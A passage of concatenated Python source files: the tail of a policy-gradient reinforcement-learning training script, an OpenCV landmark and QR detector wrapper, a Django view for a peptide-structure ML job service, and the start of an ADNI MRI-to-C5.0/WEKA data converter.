sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"reward" : np.array(rewards),
"action" : np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
#====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# YOUR_CODE_HERE
q_n = []
for path in paths:
r = path['reward']
T = len(r)
if not reward_to_go:
q = [
np.sum(np.power(gamma, np.arange(T)) * r) \
for t in range(T)
]
else:
q = [
np.sum(np.power(gamma, np.arange(T - t)) * r[t:]) \
for t in range(T)
]
q_n.extend(q)
q_n = np.array(q_n)
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
b_n = baseline_prediction.eval(feed_dict={ sy_ob_no: ob_no })
b_n = b_n * np.std(q_n, axis=0) + np.mean(q_n, axis=0)
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
# HACK: `+ 1e-8` to `std` to avoid zero-devision
adv_n = (adv_n - adv_n.mean(axis=0)) / (adv_n.std(axis=0) + 1e-8)
pass
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
q_n = (q_n - q_n.mean(axis=0)) / (q_n.std(axis=0) + 1e-8)
baseline_update_op.run(feed_dict={
sy_ob_no: ob_no,
baseline_targets: q_n
})
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
feed_data = { sy_ob_no: ob_no, sy_ac_na: ac_na, sy_adv_n: adv_n }
loss_before = loss.eval(feed_dict=feed_data)
update_op.run(feed_dict=feed_data)
loss_after = loss.eval(feed_dict=feed_data)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("LossUpdate", loss_after - loss_before)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
detector.py | # -*- coding:utf-8 -*-
#
# 封装道路二维码红十字等的检测函数,提供接口
# 用于检测和检测后的图片每50张存一次硬盘
#
from cv_detector.landmark_h import detect_h
from cv_detector.landmark import detect_landmark
from cv_detector.redcross import detect_redcross
from cv_detector.road import detect_road
from cv_detector.cv_read import CVRead
from cv_detector.qr import *
import threading
import cv2 as cv
import time
import os
class Detector:
def __init__(self):
self.cvRead = CVRead()
self.cvRead.start()
self.frame = None
self.img = None
# 初始化建立图片文件夹,将文件夹命名为时间戳,并将时间戳放到log中
self._time = time.strftime("%Y:%m:%d %H:%M", time.localtime())
self.timeArray = time.strptime(self._time, "%Y:%m:%d %H:%M")
# 时间戳(分级)
self.timeStamp = int(time.mktime(self.timeArray))
# 创建图片文件夹,保存处理后的图片
self.origpath = "./picture/" + str(self.timeStamp) + "/origpic/"
self.propath = "./picture/" + str(self.timeStamp) + "/propic/"
# 原图和处理后的图片,50张保存一次
self.origlist = []
self.prolist = []
if os.path.exists(self.origpath) is False:
os.makedirs(self.origpath)
if os.path.exists(self.propath) is False:
os.makedirs(self.propath)
self.count_ori = 1
self.count_pro = 1
self.now_time = time.time()
self.old_time = time.time()
# 日志字典,最后结束的时候,会回显到图像中
self.log_dict = {}
def save_all(self, is_exit=False):
if self.frame is not None:
self.origlist.append(self.frame)
if self.img is not None:
self.prolist.append(self.img)
# 程序退出,保存当前已记录到的图片
if is_exit:
t = threading.Thread(target=self.save_pic, args=(self.prolist, self.origlist))
t.start()
t.join()
self.prolist = []
self.origlist = []
# 日志记录回显到图像中
for key, value in self.log_dict.items():
count = 1
src = cv.imread("%s/%d.jpg" % (self.propath, key))
cv.putText(src, "alt: %d | mode: %s" %
(value[1][0], value[1][1]),
(10, 30), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
if value[0][0] is not None:
count += 1
cv.putText(src, "x: %d | y: %d | land_ag: %d | for_ag: %d" %
(value[0][0], value[0][1], value[0][2], value[0][3]),
(10, 30 * count), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
if value[2][0] is not None:
count += 1
cv.putText(src, value[2][0],
(10, 30 * count), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
cv.imwrite("%s/%d.jpg" % (self.propath, key), src)
return
# 当列表中图片数量到50时,存入硬盘
if len(self.prolist) == 50:
threading.Thread(target=self.save_pic, args=(self.prolist, self.origlist)).start()
self.prolist = []
self.origlist = []
# 检测二维码
def detect_qr(self):
self.save_all()
self.frame = self.cvRead.read()
self.img, x_bias, y_bias, qr_angle, forward_angle = detect_qr(self.frame)
return x_bias, y_bias, qr_angle, forward_angle
# 检测二维码上的一个回形区域
def detect_small_qr(self):
self.save_all()
self.frame = self.cvRead.read()
self.img, x_bias, y_bias, qr_angle = detect_small_qr(self.frame)
return x_bias, y_bias, qr_angle
# 检测路
def detect_road(self):
self.save_all()
self.frame = self.cvRead.read()
self.img, angle, x_bias = detect_road(self.frame)
if x_bias is not None:
return x_bias, -115, -1 * angle
else:
return 0, 0, 0
# 检测红十字
def detect_redcross(self):
self.save_all()
self.frame = self.cvRead.read()
self.img, x_bias, y_bias = detect_redcross(self.frame)
return x_bias, y_bias
# 检测降落标志
def detect_landmark(self):
self.save_all()
self.frame = self.cvRead.read()
self.img, x, y, l_ag, f_ag = detect_landmark(self.frame)
return x, y, l_ag, f_ag
# 检测H
def detect_h(self):
self.save_all()
self.frame = self.cvRead.read()
self.img, x, y, h_ag = detect_h(self.frame)
return x, y, h_ag
# 保存内存中的图片
def save_pic(self, prolist, origlist):
self.now_time = time.time()
self.old_time = self.now_time
# 保存处理后的图片和原图
for image in prolist:
cv.imwrite(self.propath + str(self.count_pro) + ".jpg", image)
self.count_pro += 1
for image in origlist:
cv.imwrite(self.origpath + str(self.count_ori) + ".jpg", image)
self.count_ori += 1
self.now_time = time.time()
print("save pic........ time: ", self.now_time - self.old_time)
|
views.py | import threading
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.conf import settings
from django.core.mail import EmailMessage
from django.http import JsonResponse
import os
import subprocess
from . import models
from project.settings import BASE_DIR
# index.html file and the upload form
def dashboard(request):
if request.POST and request.FILES:
try:
file = request.FILES['file']
email = str(request.POST.get('email'))
data = models.PeptideStructureData(email=email, sequence="NULL", file=file, status="SUBMITTED")
data.save()
dataset_object = models.PeptideStructureData.objects.get(id=data.id)
runback = ThreadingExample()
thread = threading.Thread(target=runback.run, args=(dataset_object, "file"))
thread.daemon = True
thread.start()
uploadstatus = True
jobID = data.id
return render(request, "index.html", {'uploadstatus': uploadstatus, 'jobID': jobID})
except Exception as e:
print(e)
uploadstatus = False
return render(request, "index.html", {'uploadstatus': uploadstatus, })
elif request.POST:
try:
email = str(request.POST.get('email'))
sequence = str(request.POST.get('sequence'))
data = models.PeptideStructureData(email=email, sequence=sequence, file="NULL", status="SUBMITTED")
data.save()
database_object = models.PeptideStructureData.objects.get(id=data.id)
runback = ThreadingExample()
thread = threading.Thread(target=runback.run, args=(database_object, "sequence"))
thread.daemon = True
thread.start()
uploadstatus = True
jobID = data.id
return render(request, "index.html", {'uploadstatus': uploadstatus, 'jobID': jobID})
except Exception as e:
print(e)
uploadstatus = False
return render(request, "index.html", {'uploadstatus': uploadstatus, })
else:
return render(request, "index.html")
# job status check using ajax
def checkStatus(request):
if request.POST:
jobid = request.POST['jobid']
try:
database_object = models.PeptideStructureData.objects.get(id=jobid)
fp = open("media/final/" + str(jobid) + "/log.txt", 'r')
text = ""
for i in fp:
text = text + "<br/>" + str(i)
response_data = {
'response': 'success',
'result_id': jobid,
'result_status': database_object.status,
'result_log': text}
return JsonResponse(response_data, status=201)
except Exception as e:
print("some error " + str(e))
return HttpResponse("error")
else:
return redirect('/')
# ajax call to send message to admin from frontend
def contact(request):
if request.POST:
cname = str(request.POST.get('cname'))
cemail = str(request.POST.get('cemail'))
csubject = str(request.POST.get('csubject'))
cmessage = str(request.POST.get('cmessage'))
# send email to admin and the customer
try:
from_email = settings.EMAIL_HOST_USER
to_list = [str(cemail),]
sendemail = EmailMessage("Message received!!!", "Hello " + cname + ",\n\nThank you for contacting us. "
"We will get back to you soon."
"\n\nYour have provided,\nName : "
+ cname + "\nSubject : " + csubject +
"\nMessage : " + cmessage +
"\n\nRegards,"
"\nAdmin"
, str(from_email), to_list)
sendemail.send()
except Exception as e:
print("Error in contact form." + str(e))
return HttpResponse("error")
return HttpResponse("success")
else:
return redirect("/")
# thread for prediction
class ThreadingExample(object,):
def __init__(self, interval=1):
self.interval = interval
def run(self, database_object, type):
try:
working_dir = str(BASE_DIR) + "/media/modelData/"
# get the info from database
result_path = str(BASE_DIR) + "/media/final/" + str(database_object.id) + "/"
# create drectory for result file
if not os.path.exists(result_path):
os.makedirs(result_path)
email = database_object.email
models.PeptideStructureData.objects.filter(id=database_object.id).update(status='THREAD STARTED')
from_email = settings.EMAIL_HOST_USER
to_list = [email, ]
send_email_started = EmailMessage("ML Tool - Job " + str(database_object.id) + " started!!!", "Hello Sir/Ma'am,\n\nWe have received "
"your file "
"and we are processing it.\n"
"Have patience.\n\nJob ID : " + str(database_object.id) +
"\n\nRegards,\nAdmin\nMLTool",
str(from_email), to_list)
send_email_started.send()
models.PeptideStructureData.objects.filter(id=database_object.id).update(status='UNDER PROCESS')
command = []
# run the scripts
if type == "file":
file_path = str(BASE_DIR) + "/" + str(database_object.file)
command = ["python", working_dir + "mainFile.py", working_dir, file_path, result_path]
else:
sequence = str(database_object.sequence)
command = ["python", working_dir + "mainSequence.py", working_dir, sequence, result_path]
status = 0
try:
print(subprocess.call(command))
models.PeptideStructureData.objects.filter(id=database_object.id).update(status='COMPLETED')
except OSError:
status = 1
print("Error in command")
models.PeptideStructureData.objects.filter(id=database_object.id).update(status='FAILED')
# mail the result
print(str(status))
if int(status) == 0:
# if completed successfully
from_email = settings.EMAIL_HOST_USER
to_list = [email, ]
send_email = EmailMessage("ML Tool - Process Completed!!!", "Hello Sir/Ma'am,\n\nCheck the attached "
"files.\n\nRegards,\nAdmin\nMLTool",
str(from_email), to_list)
fp = open(result_path + "log.txt", 'r')
send_email.attach('log.txt', fp.read(), 'text/plain')
fp.close()
fp = open(result_path + "predict_select.csv", 'r')
send_email.attach('result.csv', fp.read(), 'text/plain')
fp.close()
send_email.send()
else:
# if anything failed
from_email = settings.EMAIL_HOST_USER
to_list = [email, ]
send_email = EmailMessage("ML Tool - Some error!!!", "Hello Sir/Ma'am,\n\nCheck the attached "
"file.\n\n"
"You can contact us for more details.\n\n"
"Regards,\nAdmin\nMLTool",
str(from_email), to_list)
fp = open(result_path + "log.txt", 'r')
send_email.attach('log.txt', fp.read(), 'text/plain')
fp.close()
send_email.send()
except Exception as e:
print(e)
from_email = settings.EMAIL_HOST_USER
to_list = [email, ]
send_email = EmailMessage("ML Tool - Some error!!!", "Hello Sir/Ma'am,\n\n"
"We apologize for the inconvenience.\n"
"You can submit it again.\n\n"
"Regards,\nAdmin\nMLTool",
str(from_email), to_list)
send_email.send()
|
adniConverter.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Script that prepares ADNI-data for use with C5.0 and/or WEKA.
Takes a folder of xml files (metadata) and subfolders with .nii files (MRIs),
as downloaded from LONI archives via webbrowser (Java applet).
May perform dimensionality reduction (depending on arguments), and outputs
spec- and data-files for use with systems supplied as arguments.
"""
__author__ = "Eivind Arvesen"
__copyright__ = "Copyright (c) 2014-2015, Eivind Arvesen. All rights reserved."
__credits__ = ["Eivind Arvesen"] # Bugfixers, suggestions etc.
__license__ = "GPL3" # LGPL/GPL3/BSD/Apache/MIT/CC/C/whatever
__version__ = "0.0.3 Alpha"
__maintainer__ = "Eivind Arvesen"
__email__ = "eivind.arvesen@gmail.com"
__status__ = "Prototype" # Prototype/Development/Production
__date__ = "2015/03/31 03:43:40 CEST"
__todo__ = [
"In some serious need of generalizations/modularizations...",
"Create logging method, so that the script doesn't fail"
"silently or just quit...",
"Check/try/error that number of XML and NIFTI are alike?",
"Check that no return values (from methods) are empty...",
]
__bug__ = "None"
# Copyright (c) 2014-2015 Eivind Arvesen. All rights Reserved.
from itertools import izip_longest
from scipy import ndimage as nd
from sys import exit
import argparse
import collections
import copy_reg
import cPickle as pickle
import errno
import glob
import fnmatch
import multiprocessing as mp
import nibabel as nib
import numpy as np
import os
import re
import sys
import types
import xml.etree.cElementTree as ET
def _reduce_method(m):
"""Make instance methods pickleable."""
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
copy_reg.pickle(types.MethodType, _reduce_method)
class AdniConverter(object):
"""
Convert ADNI dataset (MRI, NIfTI) to various formats.
DESCRIBE PARAMS, METHODS, ETC.
"""
input_folder = None
file_stem = None
out_folder = {}
outformat = None
reduction = None
reduction_dict = {"P": {"name": "PCA", "value": 20},
"H": {"name": "Histogram", "value": 32}}
n_slices = None
visits = None
outfiles = []
logging = True
visits_dict = {
0: "ADNI1 Screening",
1: "ADNI1/GO Month 6",
2: "ADNI1/GO Month 12",
3: "ADNI1/GO Month 18",
4: "ADNI1/GO Month 24",
5: "ADNI1/GO Month 36",
6: "No Visit Defined"
}
out_dict = {
"C": {"filesuffix": ".data", "fileformat": "C5.0"},
"D": {"filesuffix": ".log", "fileformat": "DEBUG"},
"V": {"filesuffix": ".csv", "fileformat": "CSV"},
"W": {"filesuffix": ".arff", "fileformat": "WEKA"}
}
new_resolution = (192, 192, 160)
third_dim = None
dx_groups = {}
max_size = None
merge = None
merge_dict = [
"Normal,MCI,LMCI,AD",
"Normal,MCI,AD",
"Normal,Other",
"Other,MCI",
"Other,AD"
]
def __init__(self):
"""Initialize. Handle args, check that ouput-files does not exist."""
np.seterr(divide='ignore', invalid='ignore')
# fix PCA divide by zero "errors"...
parser = argparse.ArgumentParser(description='A script for converting (a subset of) the ADNI1/GO MRI dataset to a format that is compatible with C5.0 or WEKA.\nOutputs to relative path "Converted/<attributes>"', prog='ADNI Converter', formatter_class=argparse.RawDescriptionHelpFormatter, epilog='''\n
VISITS [-i] (ACCEPTED ARS, INCLUSIVE UPPER BOUND) | MERGED [-x] DX GROUPS
0 : ADNI1 Screening | 0: Normal / MCI / LMCI / AD
1 : ADNI1/GO Month 6 | 1: Normal / MCI / AD
2 : ADNI1/GO Month 12 | 2: Normal / Other
3 : ADNI1/GO Month 18 | 3: Other / MCI
4 : ADNI1/GO Month 24 | 4: Other / AD
5 : ADNI1/GO Month 36 |
6 : No Visit Defined |
''')
parser.add_argument(
'-c', '--clean', help='remove any previous output',
action='store_true', default=False)
parser.add_argument(
'-d', '--directory', required=True, help='directory to use',
action='store')
parser.add_argument(
'-f', '--format', nargs='*', choices=['C', 'V', 'W'],
default=['C', 'V'], help='Output format (C5.0, CSV, Weka)',
action='store')
parser.add_argument(
'-g', '--getInfo',
help='Show amount of images from visits and exit',
action='store_true', default=False)
parser.add_argument(
'-i', '--visits', type=int,
help='Latest visit to include (int <=6)', action='store')
parser.add_argument(
'-m', '--maxSize', type=float,
help='Maximum output file size (in GiB)',
action='store')
parser.add_argument(
'-n', '--slices', type=int, default=1, help='Use every Nth slice',
action='store')
parser.add_argument(
'-r', '--reduction', choices=['P', 'H'], default=None,
help='Method used for dimensionality reduction (PCA, Histogram)',
action='store')
parser.add_argument(
'-s', '--scale', type=int, default=(192, 192, 160),
help='Resolution to downscale to (x,y,z)', action='store', nargs=3)
parser.add_argument(
'-v', '--version', help='display version',
action='version', version='%(prog)s ' + __version__)
parser.add_argument(
'-x', '--mergeGroups', type=int, nargs='*',
help='Merge DX groups (int <=4)', action='store')
self.args = parser.parse_args()
self.input_folder = self.args.directory
if self.args.getInfo:
self.getInfo()
sys.exit(0)
if self.args.visits is not None:
self.visits = self.args.visits
else:
if self.args.maxSize:
self.visits = 6
else:
self.visits = 0
if self.args.maxSize:
self.max_size = self.args.maxSize
self.new_resolution = tuple(self.args.scale)
self.new_dimensions = self.args.scale
if self.args.slices:
self.n_slices = self.args.slices
self.new_dimensions[0] = self.new_dimensions[0] / self.n_slices
if self.args.reduction is not None:
self.reduction = self.args.reduction
self.new_dimensions[2] = self.reduction_dict[
self.reduction]["value"]
if self.reduction == "H":
self.new_dimensions[1], self.new_dimensions[0] = 1, 1
if self.args.mergeGroups is not None:
self.merge = [x for x in self.args.mergeGroups]
else:
self.merge = [0]
self.dx_groups = {x: {} for x in self.merge}
self.file_stem = filter(lambda x: not re.match(
r'^\s*$', x),
[x.strip() for x in self.input_folder.split('/')])[-1]
try:
os.makedirs("Converted/")
except OSError, e:
if e.errno != errno.EEXIST:
raise IOError('Error encountered during file creation.')
for mergeGroup in self.merge:
# Bruk os.path.join() - forrige gang ble sep'en en del av
# fil/mappe-navnet...
self.out_folder.update({mergeGroup:
"Converted/" + self.file_stem +
"_visits-" + str(self.visits) +
"_nSlices-" + str(self.n_slices) +
"_reduction-" +
str(self.reduction) + "_scale-" +
str(self.new_resolution[0]) + "x" +
str(self.new_resolution[1]) + "x" +
str(self.new_resolution[2]) +
"_mergeGroups-" + str(mergeGroup) + "/"})
try:
os.makedirs(self.out_folder[mergeGroup])
except OSError, e:
if e.errno != errno.EEXIST:
raise IOError('Error encountered during file creation.')
self.outfiles = list(self.out_dict[x.upper()]['filesuffix'] for x in self.args.format)
if ("C" in self.args.format):
self.outfiles.append(".names")
if ("D" not in self.args.format):
self.outfiles.append(".log")
if self.args.clean:
for mergeGroup in self.merge:
for outfile in self.outfiles:
for fl in glob.glob(self.out_folder[mergeGroup] +
self.file_stem + outfile):
try:
os.remove(fl)
except OSError, e:
raise IOError('Could not remove previous files.')
print "Removed any and all previous output files."
for mergeGroup in self.merge:
for outfile in self.outfiles:
if os.path.isfile(self.out_folder[mergeGroup] +
self.file_stem + outfile):
print "The file " + self.out_folder[mergeGroup] + \
self.file_stem + outfile + " already existed."
print "Please (re)move it before attempting to run this \
script again."
print "Exiting..."
exit(1)
else:
with open(self.out_folder[mergeGroup] + self.file_stem +
outfile, 'w') as fout:
fout.write('')
try:
os.makedirs(self.out_folder[mergeGroup] + "Results/")
except OSError, e:
if e.errno != errno.EEXIST:
raise
self.outformat = [x.upper() for x in self.args.format]
print ""
print 'Initializing...'
dict_forms = []
for format in self.outformat:
dict_forms.append(self.out_dict[format]['fileformat'])
ofs = ' + '.join(str(p) for p in dict_forms)
print ofs + ' format(s) selected.\n'
print "Using every", self.n_slices, "slice"
try:
print "Dimensional reduction via", \
self.reduction_dict[self.reduction]["name"]
except Exception, e:
print "No dimensional reduction."
print "Scaling all images to", self.new_resolution
print "Merging DX groups to scheme(s):"
for x in self.merge:
print str(x) + ":", self.merge_dict[x]
print ""
# parseXml(TRY return{...}, else fail>log)
print 'Scanning input folder for XML-files from visits up until', \
self.visits_dict[self.visits], '...'
self.allFiles = self.filterFiles(
self.getXmlFilesInFolder(self.input_folder), self.visits)
gib_const = 10**9 # 1024**3 # 2**30
if self.max_size:
maxSize = self.max_size * gib_const
print "Will stop writing when largest output-file exceeds limit \
of approximately", self.__greek__(maxSize) + "B."
else:
maxSize = float("inf")
cores = mp.cpu_count()
# Detect number of logical (not physical; i.e. HyperThreading) cores
print "\nDetected", cores, "(virtual/logical) cores."
p = mp.Pool()
manager = mp.Manager()
q = manager.Queue()
for mergeGroup in self.merge:
if ("V" in self.outformat):
sizeFile = self.out_folder[mergeGroup] + self.file_stem + \
self.out_dict['V']['filesuffix']
if ("C" in self.outformat):
sizeFile = self.out_folder[mergeGroup] + self.file_stem + \
self.out_dict['C']['filesuffix']
if ("W" in self.outformat):
sizeFile = self.out_folder[mergeGroup] + self.file_stem + \
self.out_dict['W']['filesuffix']
writer = mp.Process(
target=self.__outputProcess__, args=(q, sizeFile, maxSize, p))
writer.start()
for xmlFile in self.allFiles:
p.apply_async(
self.__workerProcess__, args=(xmlFile, q, sizeFile, maxSize))
p.close()
p.join() # Wait for all child processes to close.
writer.join()
print 'CONVERSION DONE!\n'
def __outputProcess__(self, queue, sizeFile, maxSize, pool):
"""Listen for messages on queue. Perform all writing of output."""
print'\nWriting spec-files...'
if ("V" in self.outformat):
self.writeCsvHeader()
print 'Wrote ".csv" header.'
if ("C" in self.outformat):
self.writeNames()
print 'Wrote ".names" file.'
if ("W" in self.outformat):
self.writeArffHeader()
print 'Wrote ".arff " file HEADER.'
print '\nStarting conversion of', self.allFiles.__len__(), \
'NIfTI images.\n'
images_used = 0
buffer = {}
while 1:
m = pickle.loads(queue.get())
if m == 'STOP':
# SHOULDN'T THIS BE POOL INSTEAD?
p.terminate()
break
current_image = images_used + 1
if m['file_index'] != current_image:
# save queue object in buffer if not current index
buffer[m['file_index']] = m
else:
if os.path.getsize(sizeFile) < maxSize:
self.writeLine(m['data'], m['file_object'])
print 'Converted and wrote image', m['file_index'], 'of',\
self.allFiles.__len__(), "- Largest size-constricted \
output-file", self.__greek__(os.path.getsize(sizeFile)) + "B /",\
self.__greek__(maxSize) + "B."
images_used += 1
if os.path.getsize(sizeFile) >= maxSize:
queue.put('STOP')
break
else:
current_image += 1
while current_image in buffer:
m = buffer[current_image]
self.writeLine(m['data'], m['file_object'])
print 'Converted and wrote image', m['file_index'], 'of', self.allFiles.__len__(), "- Largest size-constricted output-file", self.__greek__(os.path.getsize(sizeFile)) + "B /", self.__greek__(maxSize) + "B."
del buffer[current_image]
images_used += 1
current_image += 1
if os.path.getsize(sizeFile) >= maxSize:
queue.put('STOP')
break
if ("DEBUG" in self.outformat):
for mergeGroup in self.merge:
self.log(
mergeGroup, self.prettyFormat(
self.parseXml(xmlFile)))
else:
queue.put('STOP')
break
if current_image > self.allFiles.__len__():
queue.put('STOP')
break
self.logRun(self.allFiles.__len__(), images_used)
print "Processed and wrote", images_used, "files and lines in total."
def __workerProcess__(self, xmlFile, queue, sizeFile, maxSize):
"""Perform all data processing. Write results to queue."""
if os.path.getsize(sizeFile) < maxSize:
filei = self.allFiles.index(xmlFile) + 1
fileo = self.parseXml(xmlFile)
result = {'data': self.processData(
fileo), 'file_index': filei, 'file_object': fileo}
if os.path.getsize(sizeFile) < maxSize:
# pickle numpy-array as binary data to increase performance
queue.put(pickle.dumps(result, protocol=-1))
else:
queue.put("STOP")
else:
queue.put("STOP")
def __greek__(self, size):
"""Return a string representing the greek/metric suffix of a size."""
# http://www.gossamer-threads.com/lists/python/python/18406
abbrevs = [
(1 << 50L, 'P'),
(1 << 40L, 'T'),
(1 << 30L, 'G'),
(1 << 20L, 'M'),
(1 << 10L, 'k'),
(1, '')
]
for factor, suffix in abbrevs:
if size > factor:
break
return ("%.2f" % float((size / factor))) + ' ' + suffix
def getInfo(self):
"""Output visits from ADNI."""
visit_groups = {}
dx_groups = {}
print "Scanning input folder for XML-files..."
xml_files = self.getXmlFilesInFolder(self.input_folder)
print "Counting subjects in visit and diagnostic groups...\n"
for xml_file in xml_files:
tree = ET.parse(xml_file)
root = tree.getroot()
visit = root.find(".//*visitIdentifier").text
dx = root.find(".//*[@item='DX Group']").text
if visit not in visit_groups:
visit_groups.update({visit: 0})
visit_groups.update({visit: (visit_groups[visit] + 1)})
if dx not in dx_groups:
dx_groups.update({dx: 0})
dx_groups.update({dx: (dx_groups[dx] + 1)})
i = 0
visit_groups = collections.OrderedDict(
sorted(visit_groups.items(), key=lambda x: (x[0][0:6], x[0][-2:])))
dx_groups = collections.OrderedDict(
reversed(sorted(dx_groups.items())))
for e1, e2 in list(izip_longest(visit_groups.items(),
dx_groups.items(), fillvalue=('', '')
)):
print i, ":", e1[0], "\t", e1[1], "\t\t\t | ", e2[0], "\t", e2[1]
i += 1
print ""
def writeArffHeader(self):
"""Write header for Arff-file (WEKA)."""
for mergeGroup in self.merge:
with open(self.out_folder[mergeGroup] + self.file_stem + ".arff",
'w') as nfile:
nfile.write('@RELATION ADNI\n\n')
# nfile.write('@ATTRIBUTE ID string\n')
# nfile.write('@ATTRIBUTE age numeric\n')
# nfile.write('@ATTRIBUTE sex {M,F}\n')
# nfile.write('@ATTRIBUTE "APOE A1" integer\n')
# nfile.write('@ATTRIBUTE "APOE A2" integer\n')
# nfile.write('@ATTRIBUTE "MMSE Total Score" numeric\n\n')
# for number in range final resolution (192, 192, 160)
# each slice reduced to X components and using every Nth slice:
# THIS NEEDS TO TAKE VALUES FROM command line parameters etc.
for number in range((self.new_dimensions[0]) *
